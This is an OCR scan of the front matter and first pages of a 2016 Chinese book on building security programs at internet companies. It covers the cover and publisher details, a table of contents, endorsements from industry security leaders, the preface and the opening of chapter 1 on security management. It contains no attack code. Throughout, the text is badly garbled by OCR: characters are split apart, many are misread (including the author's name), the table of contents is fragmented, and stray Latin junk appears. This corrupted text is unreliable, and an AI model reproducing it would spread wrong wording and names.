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华章 1T 


本 书 由 业内 多 位 顶级 安全 专家 亲 力 打造 ， 分 享 了 他 们 十 多 年 的 安全 行业 经 验 。 
从 技术 到 管理 ， 从 生产 网 络 到 办 公 网 络 ， 从 攻防 对 抗 到 业务 风 控 ， 涉 及 安全 领 
域 的 各 个 维度 ， 包括 了 三 十 多 个 重要 话题 ， 为 企业 实施 符合 互联 网 特性 的 安全 
解决 方案 提供 了 实战 指南 . 





FAAP iE Me Se 
高 级 指南 


RE TLR 胡 乾 威 编著 












-Nt 


í f 
Pei fi 
“ty 
Pi 4 i 
ANCED | 
: We P: p Xy 


4 





-FOR INTERNET COMPANIES 


信息 安全 技术 丛书 


互联 网 企业 安全 高 级 指南 


Me WR WER mA 


NW 


ISBN: 978-7-111-54301-5 
本 书 纸 版 由 机 械 工业 出 版 社 于 2016 年 出 版 ， 电 子 版 由 华章 分 社 北 京华 


BAMBARA A], Ie RAAB ATT ARAB) 全 球 范围 内 制 
作 与 发 行 。 








ALATA, tA FE 

客服 热线 : + 86-10-68995265 
客服 信箱 : service@bbbvip.com 
官方 网 址 : www.hzmedia.com.cn 
新 浪 微 博 @ 华 章 数 媒 


微 信 公众 号 华章 电子 书 〈 微 信号 : hzebook) 





EPRE 
前 言 
理论 篇 
第 1 章 ”安全 大 环境 与 背景 
1.1 切入 “企业 安全 ”的 视角 
1.2 ”企业 安全 包括 哪些 事情 
1.3 互联 网 企业 和 传统 企业 在 安全 建设 中 的 区 别 
1.4 ”不同 规模 企业 的 安全 管理 
15 生态 级 企业 vs 平台 级 企业 安全 建设 的 需求 
1.6 云 环 境 下 的 安全 变迁 
第 2 章 ”安全 的 组 织 
2.1 创业 型 企业 一 定 需要 CSO 吗 
2.2 ”如 何 建立 一 支 安全 团队 
第 3 章 ” 甲 方 安全 建设 方法 论 
3.1 从 零 开始 
3.2 不 同 阶段 的 安全 建设 重点 
3.3 如何 推 动 安全 策略 
3.4 ”安全 需要 向 业务 妥协 吗 
3.5 选择 在 不 同 的 维度 做 防御 


3.6 
37 





需要 自己 发 明 安全 机 制 吗 


如 何 看 待 SDL 
STRIDE 威 胁 建 模 





3.9 关于 ISO27001 


3.10 流程 与 “ 反 流 各 
sd ) i 
J 】 


311 





业界 






防御 架构 原 





的 模糊 地 带 


大 十 大 数据 安全 
解决 方案 的 争议 


则 








防守 体系 建设 三 部 上 
LA REL 生产 网 络 的 纵深 防御 架构 





基础 安全 措施 


域 划分 





l 
7.3 
7.4 
第 8 章 
8.2 





网 络 入 侵 检 测 

T 级 DDoS 防御 

链 路 劫持 

应 用 防火 墙 WAF 
入 侵 感 知 体系 

主机 入 侵 检测 

检测 webshell 


第 9 章 








， 漏洞 扫描 的 种 关 
.3 ”如何 应 对 大 规模 的 资产 扫描 








10.3 ”移动 操作 系统 安全 简介 





管理 


10.4 签名 
10.5 ”应 用 沙 盒 及 权限 
10.7 ”安全 应 对 
108 安全 评估 
10.9 关于 移动 认证 
第 11 章 ”代码 审计 
11.2 Coverity 
办 公 网 络 安 全 
12.1 文化 问题 


ca 
na 
LHH 

















12.6 ”远程 访问 

12.8 APT 

12.9 DLP 数据 防 泄密 
12.10 ”移动 办 公 和 边界 模糊 化 





13.1 
13.2 
13.3 
13.4 





安全 管理 体系 
组 织 





KPI 


外 部 评价 指标 


”最 小 集合 
.6 ”安全 产品 研发 


隐私 保护 


访问 控制 





匿名 化 
内 容 分 级 








K 规 模 纵深 防御 体系 设计 与 实现 





安全 行业 从 业 指 南 2.0 





附录 信息 





ASRS 
(人 名 按照 姓氏 拼音 排序 ) 


本 书 是 安全 大 V 们 多 年 安全 从 业经 验 的 精华 凝聚 ， 是 互联 网 企业 安 
全 从 业 人 员 的 必 读 经 典 。 


陈 建 ， 平 安 集 团 信息 安全 资深 总 监 








长 期 以 来 ， 系 统 而 全 面 讲述 互联 网 企业 安全 的 文章 都 极 少 ， 图 书 惑 
更 少 了 。 目 前 大 多 数 文字 内 容 是 描述 各 种 攻防 细节 、 攻 击 技巧 ， 或 者 是 
理论 味道 十 足 、 高 大 上 无 比 的 安全 体系 架构 理论 ; 不 是 缺乏 企业 安全 整 
体 杂 构 以 点 代 面 ， 就 是 缺乏 企业 实际 场景 难以 落地 。 对 于 互联 网 企业 安 
全 管理 者 而 言 ， 最 有 价值 的 并 不 是 具体 的 攻防 技巧 ， 也 不 是 那些 安全 理 
论 标准 ， 而 是 一 套 可 落地 、 低 成 本 、 行 之 有 效 的 最 佳 实践 。 本 书 作者 赁 
借 在 甲 方 和 乙方 十 多 年 摸 爬 滚 打 的 实际 经 验 ， 梳 理 出 了 这 样 一 套 满 满 都 
古 经 验 的 互联 网 企业 安全 建设 最 佳 实践 ， 帮 助 企业 进行 安全 建设 时 少 走 
弯路 ， 少 花 冤枉 钱 ， 帮 助 想 往 企业 安全 方 回 及 展 的 专业 人 士 拓宽 思路 ， 
完整 视野 ， 丰 富 经 验 ， 帮 助 CSO 们 归纳 总 结 ， 审 视 发 展 。 




















陈 洋 Ccey07) ， 小 米 CSO 





互联 网 甲 方 所 面临 的 安全 挑战 ， 是 与 传统 企业 完全 不 同 的 。 甲 方 和 





乙方 ， 攻 击 和 防守 ， 角 色 转 换 并 不 容易 。 本 书 内 容 翔 实 ， 对 有 志 参 与 互 
联网 企业 安全 建设 的 人 士 来 说 ， 是 一 本 必 备 宝典 。 
CoolQ， 阿 里 巴巴 安全 部 资深 安全 专家 





大 部 分 IT 管理 者 思想 上 很 重视 安全 ， 但 是 缺少 安全 管理 理念 和 执 
行 ， 因 为 大 家 都 没有 一 个 正确 的 安全 观 ， 或 者 说 安全 体系 概念 ， 不 知道 
怎么 去 落地 执行 。 本 书 作 者 赵 贿 在 甲 方 和 乙方 都 繁 过 ， 他 的 眼界 是 可 以 
履 瘟 到 更 多 的 安全 层面 ， 这 本 书 很 好 地 从 多 个 视角 阐述 了 安全 体系 的 染 
构 ， 并 且 已 经 给 出 了 执行 步骤 ， 和 希望 对 你 的 企业 有 用 。 

— Ri, IAEA AGRA 








甲 方 安全 工作 知 不 易 ， 行 更 难 ， 本 书 结合 多 位 业界 顶尖 安全 专家 的 


经 验 从 管理 和 技术 维度 全 面 深入 放 析 了 甲 方 安全 的 场景 ;是 企业 安全 相 
关 从 业 人 员 的 通关 秘籍 。 
一 ” 方 勇 ，UCloud 安 全 中 心 总 监 


很 高 兴 看 到 赵 并 等 同学 的 大 作 问 世 ， 本 书 没 有 高 深 的 理论 知识 ， 没 
有 高 大 上 的 概念 ， 全 部 内 容 来 目 十 几 年 的 实战 经 验 和 思考 总 结 ， 相 信和 可 
以 给 在 互联 网 企业 从 事 安 全 相关 工作 的 同学 提供 全 面 、 系 统 、 接 地 气 的 


指导 和 帮助 。 
一 一 郭 添 森 ， 去 哪儿 网 安全 总 监 


大 型 互联 网 企业 的 在 线 业 务 在 触 达 了 全 网 用 户 的 同时 也 给 所 有 攻击 
者 歇 露 了 攻击 面 ， 且 攻击 者 叉 拥 有 近 平 海量 的 资产 ， 量 变 引 起 质变 ， 企 
业 的 安全 防护 问题 早已 不 仅仅 是 技术 问题 ， 更 多 的 是 工程 和 管理 问题 。 
如 何 做 好 这 里 的 工作 ， 是 令 人 头疼 的 事情 。 更 为 遗憾 的 是 ， 目 前 市 面 上 
的 信息 安全 类 书籍 要 么 是 讲 具 体 茶 类 安全 技术 ， 要 么 就 是 放 之 四 海 而 皆 
准 却 又 无 法 落地 的 理论 指导 ， 很 少 有 理论 结合 企业 实际 工作 情况 的 探 
讨 ， 这 本 书 的 出 版 弥补 了 这 个 遗憾 。 本 书 作 者 赵 彦 是 安全 圈 老 前 辈 ， 在 
甲 方 乙 方 都 工作 过 ， 有 丰富 的 经 验 ， 江 席 过 去 有 五 年 时 间 是 我 的 同事 ， 
为 腾讯 的 安全 体系 建设 做 出 了 重要 页 献 。 本 书 从 理论 、 技 术 、 实 践 三 个 
分 入 手 ， 基 本 涵盖 了 互联 网 企业 安全 的 方方面面 ， 是 企业 安全 人 员 的 
头 必 备 参考 书籍 。 强 力 推荐 。 
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——WH3H Cake2) ， 腾 讯 安 全 平台 部 总 监 








一 直 在 互联 网 公司 从 事 互 联网 安全 攻防 的 工作 ， 在 这 个 过 程 中 也 一 

符 试 寻找 一 些 相对 稳定 的 答案 。 本 书 的 价值 不 仅 在 于 手把手 告诉 你 网 
络 安全 怎么 做 ， 业 务 安全 怎么 做 ， 系 统 攻防 怎么 做 ， 虽 然 书 中 在 这 方面 
也 有 足够 精 到 的 论述 ， 它 的 价值 更 在 于 让 你 深 处 一 个 纷繁 复杂 、 日 新 月 
异 的 互联 网 大 环境 中 ， 从 外 部 到 内 部 、 从 宏观 到 微观 多 重视 角 去 思考 你 
所 服务 企业 的 信息 安全 的 方方面面 ， 让 你 理解 你 的 企业 当前 处 于 什么 样 
的 安全 位 置 ， 并 运用 恰当 的 方法 论 、 安 全 管理 手段 和 安全 技术 ， 找 到 属 
于 你 服务 企业 的 答案 。 这 本 书 是 我 见 过 的 国内 第 一 本 系统 化 训 析 整个 互 








联网 企业 安全 的 书籍 ， 如 果 早 几 年 出 现 这 样 的 书籍 ， 一 定 可 以 让 我 少 走 
几 年 弯路 ， 期 待 这 本 书 能 够 让 更 多 的 安全 同行 早日 找到 属于 自己 的 答 





案 。 








一 一 黄巾， 阿里 巴巴 安全 部 安全 总 监 





本 书 是 少见 的 横贯 信息 安全 “ 南 ”“ 北 ”之 作 ， 并 且 十 分 难得 地 分 享 了 
互联 网 公司 安全 实践 的 经 验 ， 不 论 是 从 事 “ 传 统 安全 ”还 是 “互联 网 安 
全 ”， 均 值得 一 读 。 同 时 ， 本 书包 括 的 内 容 也 相当 丰富 、 全 面 ， 涵 盖 了 
从 组 织 建立 、 建 设 方法 论 、 原 则 直至 具体 实践 ， 不 论 是 希望 加 入 信息 安 
全 行业 的 爱好 者 还 是 行业 老兵 ， 都 可 以 从 中 得 到 局 发 。 











一 一 金 湘 宇 (NUKE) ， 前 信息 技术 、 信 息 安 全 资深 顾问 ， 现 私募 投资 
人 


os 


当今 世界 的 技术 发 展 日 新 月 异 ， 安 全 工作 的 复杂 性 急剧 增高 ， 网 
与 信息 安全 事故 层出不穷 ， 知 不 能 有 效应 对 会 给 各 行 各 业 和 广大 用 户 市 
来 极 大 风险 。 非 第 洱 运 我 所 工作 的 公司 都 对 安全 非常 重视 ， 拥 有 业界 的 
一 批 安全 精英 ， 华 为 公司 的 安全 专家 赵 度 就 是 其 中 的 出 众 代表 ， 他 不 仅 
具有 坚实 的 攻防 基础 和 安全 战略 思维 ， 还 能 够 洞察 传统 安全 与 互联 网 安 
全 的 差异 ， 对 部 门 、 公 司 、 行 业 的 安全 发 展 提出 有 高 度 价 值 的 建议 。 本 
书 内 容 来 源 于 实践 ， 经 过 了 深入 的 分 析 和 提炼 ， 升 华 成 为 有 益 的 指导 和 
参考 ， 相 信和 不 论 是 CSO 还 是 刚 入 行 的 从 业者 ， 不 论 是 安全 专业 人 员 还 是 























想 了 解 安全 的 业务 人 员 ， 都 会 从 本 书 中 获 苞 展 多 。 


一 一 他 雨 航 ，Huawei Global Chief Scientist/Technologist (Cyber 
Security) ， 网 络 安全 实验 室 CTO 兼 国际 CSO，CSA 大 中 华 区 主席 ， 
XJTU Fellow/Professor 





终于 看 到 一 本 真正 意义 上 企业 安全 方面 的 书籍 ， 作 者 兼顾 广博 与 精 
深 的 专业 功 捕 ， 横 路 甲乙 方 、 传 统 安全 与 互联 网 安全 的 多 个 行业 领域 的 
视角 与 知识 层次 ， 相 信 每 一 位 读者 都 会 有 所 收获 。 从 攻防 以 外 的 视角 ， 
体系 化 地 介绍 安全 ， 对 企业 安全 的 负责 人 、 从 业者 以 及 乙方 机 构 咨询 与 
技术 人 员 都 有 很 好 的 实用 指南 作用 。 








一 一 闫 树 鹏 ， 沉 滴 出 行 首 席 安 全 顾问 





很 高 兴 在 这 个 时 间 看 到 这 样 一 本 书 的 面世 ， 在 试 读 样 章 时 ， 产 生 了 
很 多 的 共鸣 。 企 业 做 安全 很 难 ， 尤 其 是 在 以 开放 和 不 断 变化 著称 的 互联 
网 领域 尤其 。 业 务 形 态 的 差异 决定 了 各 个 企业 的 安全 目标 不 尽 相 
同 。* 方 向 错 了 ， 前 进 便 是 倒退 ”。 企 业 安 全 的 不 同 阶段 如 何 合理 地 设 定 
目标 ， 选 择 切实 可 行 的 方案 ， 以 及 如 何在 有 限 的 时 间 、 人 力 和 资源 下 前 
行 ， 是 安全 管理 者 们 必须 面 对 的 问题 。 安 全 建设 必然 伴随 独 不 断 的 取 
售 、 权 衡 ， 乃 至 博弈 。 和 希望 阅读 此 书后 能 让 每 个 安全 人 员 在 大 到 安全 规 
划 、 策 略 制定 ， 小 到 每 个 安全 漏洞 修补 、 策 略 上 线 ， 乃 至 安全 事件 的 应 
和 急 退 碍 中 ， 都 能 认 清 目 己 所 做 事情 在 企业 安全 赣 图 中 的 位 置 ， 而 不 是 为 











了 做 事 而 做 事 ， 更 好 地 “搞定 ”事情 。 








xi4oyu， 百 度 安 全 实验 室 Xteam 负 贡 人 


相 比 技术 篇 ， 本 书 的 理论 篇 更 加 精彩 。 互 联网 安全 从 业者 最 大 的 挑 
战 并 非 技 术 ， 而 是 如 何 建立 正确 的 行业 格局 观 ， 并 且 能 够 与 业务 团队 、 
安全 团队 管理 层 、 公 司 管理 层 建 立 良 好 的 沟通 机 制 ， 取 得 信任 和 支持 。 
本 书 的 几 位 作者 在 互联 网 行业 有 着 丰富 的 安全 管理 和 从 业经 验 ， 强 烈 推 
存 有 志 于 从 事 互 联网 安全 行业 的 朋友 阅读 。 











一 ”和 薛 锋 ， 微 步 在 线 CEO， 原 亚马逊 中 国 CISO 


当今 的 互联 网 对 企业 安全 老大 的 需求 远 远 大 过 供给 。 不 客气 的 说 ， 
现在 很 多 互联 网 的 安全 负责 人 都 是 被 赶 鸭子 上 架 ， 在 工作 中 摸索 学 习 做 
CSO 的 。 有 些 聪明 的 、 注 重 学 习 的 人 ， 到 疯 后 能 逐步 建成 一 只 有 一 定 实 
力 并 且 能 逐步 成 长 的 团队 。 男 外 一 些 就 利用 CTO 不 异 安 全 ， 菲 一 张嘴 皮 
子 欺 上 瞒 下 ， 拉 了 一 票 上 自己 人 搞 办 公 室 政治 。 而 真正 有 实战 经 验 、 有 创 
新 力 、 能 系统 性 地 写 这 样 一 本 书 的 极 少数 人 ， 大 都 正 忙于 建设 自己 企业 
的 安全 团队 或 者 在 创业 路 上 ， 没 有 时 间或 者 没有 动力 写 。 本 人 曾经 有 和 圣 
在 美国 做 过 互联 网 企业 的 甲 方 和 乙方 ， 并 且 在 三 个 中 国 互联 网 企业 分 别 
从 头 建设 了 三 只 安全 团队 。 虽 然 我 也 动 过 这 个 心思 写本 书 总 结 一 下 经 验 
教训 以 及 中 间 的 有 趣 的 人 和 事 ， 但 也 是 打算 退休 以 后 才 做 。 另 外 我 从 市 
场 的 角度 考虑 ， 真 正 关 心 这 个 问题 的 人 少 的 可 怜 ， 写 完了 我 估计 想 看 的 

















人 也 不 会 多 ， 可 能 最 终 就 是 个 自 娱 自 乐 喷 了 。 赵 谍 是 这 个 极 少数 的 人 和 群 
中 的 一 个 极 少 数 派 ， 居 然 现 在 就 有 时 间 有 兴趣 写 出 这 样 一 本 书 出 来 。 当 
然 ， 每 个 企业 不 同 ， 每 个 CSO 的 思想 方法 不 同 ， 这 本 书 里 的 有 些 方法 或 
者 说 法 CSO 们 并 不 见得 会 完全 赞同 ， 但 是 这 本 书 给 CTO 或 者 准备 当 CSO 
的 人 提供 了 一 个 比较 完整 的 视角 ， 把 CSO 有 具体 都 应 该 解决 什么 问题 讲 清 
楚 了 ， 而 不 是 以 前 笼统 的 一 名 “反正 安全 出 了 事 就 都 是 他 负责 ”。 除 了 介 
绍 问题 以 外 ， 本 书 也 介绍 了 一 些 系统 方法 帮助 新 上 任 的 CSO 整 理 一 下 总 
体 思路 。 总 之 ， 这 是 一 本 当下 业界 急 缺 的 书 。 








一 一 杨 更 ， 前 小 米 、 FA 亚马逊 中 国 CSO 


此 书 凝 结 了 赵 彦 对 互联 网 企业 安全 体系 建设 的 思考 和 经 验 提 炬 ， 瞻 
访 了 管理 和 解决 方 采 ， 在 宏观 面 阐述 了 自己 的 理解 和 安全 观 ， 对 安全 领 
域 从 业者 是 一 份 很 好 的 参考 资料 。 








一 一 杨 男 〈Coolc) ， 腾 讯 云 副 总 裁 ， 腾 讯 安 全 平台 部 负责 人 





干货 ! 是 落地 实践 还 是 纸上谈兵 ， 是 美女 还 是 野兽 ， 作 者 抽 丝 剥 
量 、 层 层 展开 ,分享 了 他 们 在 互联 网 企业 安全 领域 中 丰富 的 实战 心得 ， 
甲 方 和 乙方 都 非常 值得 阅读 参考 。 














一 一 赵 粮 博 士 ， 绿 盟 科 技 首 席 技 术 官 





对 于 绝 大 多 数 的 企业 来 说 ， 安 全 是 信息 技术 建设 中 注 弱 而 又 很 难 提 





高 的 环节 ， 而 这 个 环节 上 发 生 的 问题 又 会 深刻 地 影响 到 整个 企业 ， 本 书 
深入 浅 出 地 介绍 企业 信息 安全 体系 从 建设 到 实施 的 一 套 完整 过 程 ， 强 列 
建立 企业 信息 安全 技术 团队 的 负责 人 都 能 阅读 此 书 ， 一 定 能 让 你 受益 菲 
浅 。 








—— FRE Ccnhawk) , MA REREERR 


2 二 = 
BY a 


在 互联 网 + 的 进程 中 ， 一 方面 互联 网 企业 越 来 越 多 ， 另 一 方面 由 外 
部 环境 推动 的 或 自发 的 安全 意识 越 来 越 强 ， 对 安全 建设 的 需求 也 越 来 越 
多 ， 很 多 企业 都 开始 招聘 安全 负责 人 ， 不 乏 年 薪 上 百 万 元 和 几 百 万 元 的 
安全 负责 人 职位 ， 但 事实 是 很 多 公司 常年 用 高 薪 ， 都 招 不 到 合适 的 安全 
负责 人 ， 其 中 的 原因 有 很 多 ， 比 较 客 观 的 一 条 就 是 这 个 行业 所 培养 的 有 
互联 网 整体 安全 视角 的 人 实在 寥寥 无 几 ， 而 这 些 人 大 都 不 缺 高 薪 ， 也 不 
缺 职 位 。 我 在 “信息 安全 行业 从 业 指 南 2.0” 一 文中 曾经 写 过 自 2014 年 开 
始 ， 安 全 行业 的 大 部 分 高 端 人 才 都 在 互联 网 行业 ， 为 什么 还 是 有 那么 多 
wO? 细 想 了 一 下 有 几 个 方面 的 因素 : 




















过去， 安全 并 不 太 受 重视 ， 安 全 从 业者 的 职业 发 展 瓶 颈 明 显 ， 很 
多 拥有 整体 安全 视角 的 人 离开 了 安全 行业 转 去 做 其 他 的 事情 了 。 


早年 在 乙方 安全 公司 的 人 经 历 了 给 客户 从 零 开 始 建设 安全 体系 的 
过 程 ， 而 后 来 进入 乙方 的 毕业 生 ， 接 触 客 户 时 大 都 已 经 有 安全 体系 ， 无 
法 体验 从 0 到 1 的 过 程 并 从 中 学 到 完整 的 方法 论 ， 很 多 方法 论 甚至 已 “ 失 
传 "， 有 些 方法 论 原本 就 只 集中 在 公司 总 部 的 一 圈 人 手 里 ， 分 文 机 构 除 
了 文档 得 不 到 “大 象 ”。 


:BAT 这 类 企业 安全 也 早已 经 过 安全 建设 期 ， 后 来 者 分 工 很 细 ， 除 








了 几 个 早已 号 居 总 监 职位 的 老 员 工 之 外 ， 大 多 数 人 无 法 得 知 安全 体系 的 
全 狐 ， 很 多 人 离开 了 BAT 也 说 不 清 目 己 责任 之 外 的 事情 该 怎么 做 。 








二 三 线 互 联网 企业 中 ， 很 多 团队 所 持 有 的 安全 体系 并 不 完整 ， 也 
不 是 业内 最 佳 实践 ， 有 些 甚 至 束 是 救火 型 团队 ， 更 难 有 体系 化 的 积累 。 





当下 的 很 多 乙方 安全 公司 ， 在 互联 网 大 漳 的 冲击 下 也 面临 着 转型 
的 挑战 ， 要 提供 符合 时 代 趋 势 的 解决 方案 仍 需 努力 。 


-在 社区 ， 目 前 大 家 者 热衷 攻防 ， 而 不 是 企业 安全 建设 。 攻 击 者 、 
乙方 、 甲 方 之 间 仍 然 存在 较 大 的 鸿沟 ， 彼 此 互相 不 届 ， 从 社区 里 也 多 半 
只 能 挖掘 到 一 些 单 点 型 的 防御 手法 ， 即 便 好 学 的 人 订阅 了 所 有 的 安全 站 
扩 和 微 信 公 众 写 ， 合 怕 也 难以 学 会 企业 整体 安全 建设 的 方法 。 


基于 以 上 种 种 原因 ， 我 明显 感 党 到 有 一 堵 墙 存在 于 业界 、 社 区 、 甲 
方 、 乙 方 、 想 学 习 的 人 和 信息 的 不 对 称 之 间 ， 我 决定 动手 推倒 这 墙 墙 ， 
所 以 就 有 了 这 本 书 。 


首先 本 书 聚 焦 于 互联 网 行业 的 企业 级 安全 解决 方案 、 架 构 、 方 法 论 
和 建设 思路 ， 关 于 单 点 技术 ， 市 面 上 已 经 有 很 多 书 ， 所 以 本 书 内 容 大 多 
不 会 围绕 单 点 技术 来 讲 ， 而 是 希望 读者 看 完 之 后 找到 企业 安全 整体 建设 
的 那 种 感觉 。 即 便 是 一 个 甲 方 安全 工程 师 ， 也 能 从 中 学 到 互联 网 公司 安 
全 负责 人 的 知识 和 视野 ， 并 以 此 为 导航 ， 逐 步 积 昧 自己 所 需要 的 知识 和 
技能 ， 回 更 高 的 层级 发 展 。 








对 于 乙方 安全 公司 的 从 业者 而 言 ， 顾 问 们 或 许可 以 从 中 了 解 甲 方 的 
需求 和 工作 ， 从 而 提供 更 加 接地 气 的 交付 方 采 。 对 于 产品 设计 和 研发 人 
员 ， 本 书展 示 的 互联 网 安全 架构 有 助 于 拓展 传统 安全 的 思路 ， 不 一 定 能 
直接 复 用 ， 但 也 许 能 有 所 启发 。 








对 于 黑客 技术 爱好 者 ， 比 较 安 全 的 道路 仍然 古 从 事 安 全 ， 不 可 避免 
地 也 要 学 习 这 些 ， 局 级 的 渗透 和 攻击 技巧 都 需要 绕 过 防御 手段 ， 了 解 防 
御 者 思维 是 必须 跨 过 的 门槛 。 


本 书 同样 适用 于 想 了 解 企 业 安 全 建设 的 CTO、 运 维 总 监 、 研 发 总 
监 、 架 构 师 。 但 本 书 内 容 都 假设 读者 有 一 定 的 基础 ， 对 一 些 比较 基础 的 
名 词 和 技术 没有 做 太 多 的 解释 。 








在 出 版 这 本 书 时 由 于 时 间 和 信息 披露 方面 的 限制 ， 写 出 来 的 部 分 与 
我 们 原先 期 望 的 仍 有 不 少 差距 ， 但 男 一 方面 我 们 希望 像 互联 网 产品 的 达 
代 方 式 一 样 ， 不 追求 完美 ， 但 求 尽 快 面世 ， 因 此 本 书 也 难免 带 着 各 种 
bug 上 线 ， 也 欢迎 各 位 读者 的 意见 或 建议 。 此 外 ， 我 们 计划 在 本 书 的 第 2 
版 中 进一步 展开 茶 些 话题 ， 并 且 更 加 系统 化 ， 同 时 会 在 业界 最 佳 实 践 方 
面 挑战 男 一 个 维度 。 





最 后 特别 感谢 本 书 的 编辑 吴 怡 自我 在 360 工 作 时 便 找 到 我 ， 建 议 我 
将 网 络 中 的 文字 写成 书 ， 让 更 多 的 人 能 读 到 。 感 谢 另 外 两 位 作者 江 虎 
(ID: xti9er) FHR CD: Rayxcp) 帮 我 分 担 了 很 多 压力 ， 使 得 此 





书 能 尽快 面世 。 同 时 感谢 netxfly@ 小 米 、 职 业 从 钱 @ 腾 讯 、clyde@ 电 信 


云 担 、 终 极 修炼 师 @ 唯 品 会 、laintoday@ 爱 奇 艺 提供 的 帮助 。 


安全 大 环境 与 背景 


安全 的 组 织 


甲 方 安全 建设 方法 论 


业界 的 模糊 地 带 


Fle ”安全 大 坏 境 与 背景 


如 果 从 一 个 很 微观 的 角度 切入 企业 安全 这 个 话题 ， 那 么 大 多 数 人 会 
像 一 叶 孤 舟 跌 进 大 海藻 茫然 找 不 到 方 回 ， 所 以 本 章 从 安全 领域 整体 环境 
入 手 ， 以 便于 读者 找到 系统 性 的 那 种 感觉 。 尽 管 笔者 没有 致力 于 提供 关 
于 企业 安全 的 一 个 非常 完整 的 "上帝 视 角 ”， 但 也 尽 可 能 地 兼顾 了 这 方面 
的 需求 。 








1.1 切入 “企业 安全 ”的 视角 


目前 安全 行业 中 “二 进 制 * 和 “脚本 ”流派 广为人知 ， 虽 然 他 们 是 安全 
行业 的 主力 军 ， 但 除了 微观 对 抗 之 外 ， 安 全 是 一 个 很 大 的 工程 ， 比 如 企 
业 安 全 管理 ， 实 际 上 并 不 属于 上 述 两 类 。 确 切 来 次 ， 应 归 入 另外 一 个 群 
fk: CSOs， 加 了 s 表 示 他 们 是 一 个 群体 ， 这 个 群体 从 生态 链 的 顶端 联接 
着 绝 大 多 数 从 业者 和 安全 厂商。 在 这 个 描述 中 我 并 没有 发 明 新 的 名 词 ， 
没有 新 建 一 个 诸如 气 宗 剑 、 宗 这 样 的 词 ， 只 是 在 知识 结构 和 职业 背景 
做 一 定 的 区 分 ， 用 于 后 续 对 这 本 书 的 扩展 。 








企业 安全 是 不 是 发 现 漏洞 然后 修复 漏洞 ， 再 设置 一 下 防火 墙 之 类 的 
工作 ? 假如 你 的 公司 只 有 一 个 产品 、 两 全 服务 器 、3 个 程序 员 ， 我 认为 
这 个 说 法 不 能 算 错 。 不 过 在 绝 大 多 数 情 况 下 ， 企 业 安 全 远 不 止 于 此 。 渗 
透 性 测试 和 对 抗 能 不 能 算 企 业 安全 ? 在 一 个 过 于 纸上谈兵 的 企业 我 觉得 
这 是 不 错 的 切入 点 ， 不 过 局 部 对 抗 发 生 于 企业 安全 的 各 个 场景 中 ， 它 只 
能 算是 缩影 ， 不 是 全 狐 。 企 业 安 全 是 什么 ? 对 传统 乙方 安全 公司 ， 对 新 
兴 的 业务 安全 公司 、 移 动 安全 公司 ， 对 甲 方 的 互联 网 公司 ， 对 甲 方 的 传 
统 公司 ， 对 咨询 顾问 ， 对 漏洞 研究 者 ， 对 活跃 于 各 大 SRC 上 的 白 帽 子 们 
来 次， 诠释 肯定 都 不 一 样 。 














先 说 一 下 笔者 的 经 历 ， 以 便 了 解 是 从 什么 角度 来 阐述 这 一 问题 的 。 





学 生 时 代 跟 现在 的 很 多 白 帽 子 一样 玩 玩 渗透 ， 玩 玩 二 进 制 ， 在 过 去 叫 约 
ne (Ph4ntOm) 的 组 织 里 认识 了 很 多 大 V， 大 学 毕业 后 即 进 了 绿 盟 做 渗 
透 测试 、 安 全 服务 和 咨询 ， 这 是 乙方 中 离 甲 方 安 全 最 近 的 职位 ， 接 受 了 
绿 盟 对 传统 安全 体系 和 方法 论 的 教育 ， 有 些 10 年 前 的 东西 放 到 今天 看 都 


还 会 觉得 完全 不 过 时 。 











现在 的 安全 行业 里 除了 显得 有 些 务虚 的 安全 理论 之 外 ， 要 么 就 是 一 
边 倒 的 攻防 ， 要 么 就 是 过 于 超前 、 浮 在 表面 没有 落地 方案 的 新 概念 ， 这 
些 声音 对 企业 安全 实 操 都 缺乏 积极 的 意义 。 有 些 方法 论 是 有 实 操 意义 
的 ， 并 不 像 攻防 研究 者 声称 的 是 纯 务 虚 的 东西 ， 纯 粹 是 位 置 决定 想法 的 
问题 。 还 有 些 流行 的 概念 在 解决 实际 问题 上 的 效 末 有 符 验 证 ， 并 不 像 市 
场 惑 吹 的 那么 好 。 技 术 很 重要 ,但 攻防 只 解决 了 一 半 问 题 ， 安 全 的 工程 
化 以 及 体系 化 的 安全 架构 设计 能 力 是 业内 普 衣 的 软肋 ， 多 数 人 不 擅 此 
道 。 对 市 场 上 的 各 种 观点 ， 我 认为 可 能 需要 一 个 相对 客观 的 评价 ; BIA 
项 技术 或 管理 在 全 生命 周期 的 各 个 环节 中 ， 在 不 同 的 行业 、 不 同 的 场景 
下 有 什么 样 的 价值 ， 而 不 是 很 随意 地 贴标签 。 很 多 概念 10 多 年 前 就 有 
了 ， 人 发 明 一 个 新 概念 讲 与 过 去 一 样 的 事情 ， 再 给 目 己 贴 一 个 发 明 者 的 标 
签 对 行业 没有 积极 的 意义 。 纵 深 防 御 之 类 的 概念 在 ISS 没 被 IBM 收 购 之 
前 束 有 了 ， 为 什么 现在 有 的 人 觉得 这 个 词 很 新 ? 因为 过 去 没 重视 ， 或 者 
说 缺少 实践 。 




















在 绿 盟 最 大 的 便利 并 不 是 下 班 路 上 随便 都 能 找到 能 聊 exploit 技 术 的 


大 牛 ， 而 是 视野 从 金字 塔 视角 看 到 安全 的 整体 解决 方案 ， 赛 括 组 织 、 
管理 和 技术 3 方面 的 东西 ， 履 盖 全 行业 全 价值 链 过 程 的 技术 方案 ， 算 上 
第 三 方 的 话 几 乎 涵盖 市 面 上 所 有 的 安全 产品 和 解决 方案 。 有 人 看 到 这 些 
会 问 : 这 不 是 传统 安全 那 一 套 吗 ? 且 不 急 ， 本 书后 面 讲 的 部 是 围绕 互联 
网 企业 安全 的 ， 并 不 打算 在 传统 安全 上 人 花 很 多 篇 幅 ， 只 是 需要 区 分 一 下 
企业 安全 实际 的 状况 和 某 些 广 商 为 了 兜售 自己 的 产品 而 宣扬 的 概念 是 有 
所 不 同 的 ， 大 多 数 广 商都 会 避 开 目 己 的 弱项 而 在 市 场 活动 及 软文 上 专注 
地 强调 自己 擅长 的 概念 。 























离开 绿 盟 后 我 去 了 甲 方 ， 一 家 大 型 网 游 公司 ，2008 年 将 近 万 台 的 物 
理 服务 器 分 布 于 三 十 多 个 IDC 的 规模 似乎 比 当 时 搜狐 全 站 的 IDC 规 模 还 
要 大 一 些 。 跟 现在 一 样 ， 那 时 候 也 是 普遍 缺少 安全 负责 人 的 时 代 ， 我 也 
有 幸 组 建 了 一 文 属 于 自己 的 安全 团队 ， 成 为 当时 极 少数 的 安全 总 监 之 
一 。 团 队 中 的 人 现在 过 布 互联 网 行业 的 半壁 江山 ， 且 都 是 安全 部 门 独 当 
